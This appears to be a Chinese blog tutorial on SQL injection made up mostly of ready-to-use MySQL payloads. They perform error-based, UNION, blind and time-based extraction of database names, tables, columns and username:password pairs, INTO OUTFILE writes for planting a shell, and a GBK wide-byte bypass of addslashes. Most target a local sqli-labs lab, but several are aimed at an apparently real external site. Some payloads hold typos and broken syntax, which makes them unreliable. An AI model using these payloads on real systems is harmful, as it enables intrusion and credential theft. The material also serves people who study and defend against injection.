Web安全之:SQL注入

条件
用户可以接触并修改发送到服务器的内容
URL判断
and 1=1 and 1=2 依据返回信息判断 整形
’ 同上 字符型判断
-1 / +1 回显上个页面 整形
and sleep(12) 返回时间

原理
类型与手法
判断方法

以下均为完美条件下。。。
报错 floor
floor方法

mysql> select concat(select database());
mysql> select concat(select database(),0x3a);
mysql> select concat(select database(),0x3a,floor(rand()*2));
mysql> select concat(select database(),0x3a,floor(rand()*2)) a;
mysql> select concat(select database(),0x3a,floor(rand()*2)) a from information_schema;
mysql> select concat(select database(),0x3a,floor(rand()*2)) a from information_schema.tables;
mysql> select concat(select database(),0x3a,floor(rand()*2)) a from information_schema.tables group by a;
mysql> select conut(*),concat(select database(),0x3a,floor(rand()*2)) a from information_schema.tables group by a;
ERROR 1062 (23000): Duplicate entry ‘:security:1’ for key ‘group_key’

依据语句返回错误判断数据库、用户、版本、主机类型等信息
获取数据库个数:

http://127.0.0.1/ctf/sqli-labs/Less-5/index.php
?id=1’+and(select 1 from(select count(*),concat((select (select (select concat(0x7e7e3a7e7e, count(distinct+table_schema),0x7e7e3a7e7e) from information_schema.tables)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)–+

数据库:
http://127.0.0.1/ctf/sqli-labs/Less-5/index.php
?id=-1’ UNION SELECT 1,count(*),concat(0x3a,(select database()),0x3a,floor (rand()*2)) a from information_schema.tables group by a– +

查表:

http://127.0.0.1/ctf/sqli-labs/Less-5/index.php
?id=-1’ UNION SELECT 1,count(*),concat((select table_name from information_schema.tables where table_schema=’security’ limit 1,1),0x3a,floor (rand()*2)) a from information_schema.tables group by a– +

字段:

http://127.0.0.1/ctf/sqli-labs/Less-5/index.php
?id=-1’ UNION SELECT 1,count(*),concat((select column_name from information_schema.columns where table_name=’users’ limit 2,1),0x3a,floor (rand()*2)) a from information_schema.tables group by a– +

数据:

http://127.0.0.1/ctf/sqli-labs/Less-5/index.php
?id=-1’ UNION SELECT 1,count(*),concat((select concat_ws(0x3a,username,password) from users limit 1,1),0x3a,floor (rand()*2)) a from information_schema.tables group by a– +

ps:修改limit的值可实现查询不同用户或表名等 在MySQL 5.x版本

可采用文件导出方式(当前MySQL用户拥有文件操作权限)
数据库:

http://127.0.0.1/ctf/sqli-labs/Less-7/index.php
?id=1’)) UNION SELECT 1,database(),3 into outfile “D:/Wamp/www/ctf/sqli-labs/Less-7/tests.txt” –+

也是写入shell的方式,导出文件不支持覆盖 可将查询一次性导出

盲注 适合MySQL 5.x以下及一些禁报错的语句
判断版本:

http://127.0.0.1/ctf/sqli-labs/Less-8/index.php
?id=1’ and substr(version(),1,1)=5–+ #返回正常则为MySQL 5.x

数据库:

http://127.0.0.1/ctf/sqli-labs/Less-8/index.php
?id=1’ and (length(database()))=8–+ #测试数据库长度
http://127.0.0.1/ctf/sqli-labs/Less-8/index.php
?id=1’ and ascii(substr(database(),1,1))>110–+
http://127.0.0.1/ctf/sqli-labs/Less-8/index.php
?id=1’ and ascii(substr(database(),1,1))<116–+
http://127.0.0.1/ctf/sqli-labs/Less-8/index.php
?id=1’ and ascii(substr(database(),1,1))=115–+ #第一个字母为s
依据页面显示依次判断数据库名组成
表名:

http://127.0.0.1/ctf/sqli-labs/Less-8/index.php
?id=1’ and (select length(table_name)> from information_schema.tables where table_schema=database() limit 0,1) –+ #true
http://127.0.0.1/ctf/sqli-labs/Less-8/index.php
?id=1’ and (select length(table_name)>7 from information_schema.tables where table_schema=database() limit 0,1) –+ #false
http://127.0.0.1/ctf/sqli-labs/Less-8/index.php
?id=1’ and (select length(table_name)=6 from information_schema.tables where table_schema=database() limit 0,1) –+ #true 第一个表长度为6
http://127.0.0.1/ctf/sqli-labs/Less-8/index.php
?id=1’ and asii(select table_name from information_schema.tables where table_schema=database() limit 0,1)=65 –+ # ascii(e)=65
修改limit值依次测试表名
http://127.0.0.1/ctf/sqli-labs/Less-8/index.php
?id=1’ and (select length(column_name)>4 from information_schema.columns where table_name limit 0,1) –+

重复操作字段猜测

以上操作只适合MySQL 5.x及一些information_schema库拥有可查看权限
http://127.0.0.1/ctf/sqli-labs/Less-8/index.php
?id=1’ and (length(database()))=8–+ #测试数据库长度
http://127.0.0.1/ctf/sqli-labs/Less-8/index.php
?id=1’ and ascii(substr(database(),1,1))>110–+
http://127.0.0.1/ctf/sqli-labs/Less-8/index.php
?id=1’ and ascii(substr(database(),2,1))<116–+
http://127.0.0.1/ctf/sqli-labs/Less-8/index.php
?id=1’ and ascii(substr(database(),3,1))=115–+
http://127.0.0.1/ctf/sqli-labs/Less-8/index.php
?id=1’ and exists(select * from users) –+ #依页面返回值及常用表名判断是否存在
基于是盲注sleep方法

http://gaoneng.com/hz.php?id=37 and 1=2 union select 1,2,(select group_concat(schema_name)from information_schema.schemata),…,x 爆数据库

http://gaoneng.com/hz.php?id=37 and 1=2 union select 1,2,(select group_concat(table_name)from information_schema.tables where schema_name=’数据库名字’),…,x 爆表

http://gaoneng.com/hz.php?id=37 and 1=2 union select 1,2,(select group_concat(column_name)from information_schema.columns where table_name=’表名’),…,x 爆字段

http://gaoneng.com/hz.php?id=37 and 1=2 union select 1,2,(select group_concat(user,pass)from 表名 ),…,x 报数据

宽字节注入
条件 gbk编码
sql注入中的宽字节国内最常使用的gbk编码,这种方式主要是绕过addslashes等对特殊字符进行转移的绕过。反斜杠\的十六进制为%5c,在你输入%bf%27时,函数遇到单引号自动转移加入\,此时变为%bf%5c%27,%bf%5c在gbk中变为一个宽字符“縗”。%bf那个位置可以是%81-%fe中间的任何字符。

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值